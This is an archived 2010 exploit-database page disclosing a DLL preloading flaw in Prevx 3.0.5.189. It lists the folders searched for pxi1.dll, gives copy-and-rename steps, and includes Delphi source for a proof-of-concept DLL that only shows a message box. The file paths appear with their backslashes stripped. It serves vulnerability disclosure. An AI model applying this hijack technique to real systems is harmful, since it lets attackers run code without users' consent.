Prevx DLL preloading exploit
Posted on 12 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Prevx DLL preloading exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================ Prevx DLL preloading exploit ============================ ==================================================== = PREVX DLL PRELOADING EXPLOIT = ==================================================== Exploit Title : [Prevx DLL preloading exploit] Date : [11 Sept 2010] Author : [STRELiTZIA] Software : [Prevx 3.0.5.189] Tested on : [Windows Xp SP3] ============================ = Description = ============================ Prevx search and laod "pxi1.dll" library without checks, or any visual warning messages related to library modifications. Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege context of the targeted application. ============================ = Instructions = ============================ Default searching folders: C:WINDOWSpxi1.dll C:WINDOWSsystempxi1.dll C:WINDOWSsystem32pxi1.dll C:WINDOWSsystem32wbempxi1.dll Additional folders if exists: C:Program FilesBorlandDelphi7Binpxi1.dll C:Program FilesBorlandDelphi7ProjectsBplpxi1.dll C:Documents and SettingsAll UsersDocumentsRAD Studio7.0Bplpxi1.dll 1- Copy "Test.dll" into "%One of listed folders% folder" 2- Rename "Test.dll" to "pxi1.dll" ============================ = Tests = ============================ - Launch Prevx. - Restart your PC. ============================ = Test Dll Source "Delphi" = ============================ Library Test; uses Windows; begin MessageBoxA ( 0, PChar('Yep, I''m running in your system without your permission.'), PChar('Sample'), MB_ICONSTOP ); end. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-12]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
